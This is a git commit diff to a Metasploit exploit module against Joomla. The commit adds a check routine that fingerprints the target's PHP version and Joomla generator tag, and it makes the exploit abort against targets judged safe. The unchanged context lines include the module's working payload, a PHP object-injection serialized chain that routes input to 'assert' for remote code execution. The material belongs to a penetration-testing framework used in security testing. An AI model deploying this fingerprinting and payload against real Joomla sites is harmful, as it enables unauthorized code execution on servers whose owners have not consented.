Add a check for joomla
wchen-r7
parent
e4309790f5
commit
b9b280954b
|
|
@ -49,6 +49,39 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
res = send_request_cgi({'uri' => target_uri.path })
|
||||||
|
|
||||||
|
unless res
|
||||||
|
vprint_error("Connection timed out")
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
unless res.headers['X-Powered-By']
|
||||||
|
vprint_error("Unable to determine the PHP version.")
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
php_version = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)/i).flatten.first || ''
|
||||||
|
vprint_status("Found PHP version: #{php_version}")
|
||||||
|
|
||||||
|
if php_version > '5.3'
|
||||||
|
vprint_error('This module currently does not work against this PHP version')
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
res.get_html_meta_elements.each do |element|
|
||||||
|
if element.attributes['name'] &&
|
||||||
|
/^generator$/i === element.attributes['name'] &&
|
||||||
|
element.attributes['content'] &&
|
||||||
|
/joomla/i === element.attributes['content'].value
|
||||||
|
return Exploit::CheckCode::Detected
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
def get_payload
|
def get_payload
|
||||||
pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
|
pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
|
||||||
middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
|
middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
|
||||||
|
|
@ -58,7 +91,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
|
return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def print_status(msg='')
|
||||||
|
super("#{peer} - #{msg}")
|
||||||
|
end
|
||||||
|
|
||||||
|
def print_error(msg='')
|
||||||
|
super("#{peer} - #{msg}")
|
||||||
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
if check == Exploit::CheckCode::Safe
|
||||||
|
print_error('Target seems safe, so we will not continue.')
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
print_status("Sending payload ...")
|
print_status("Sending payload ...")
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue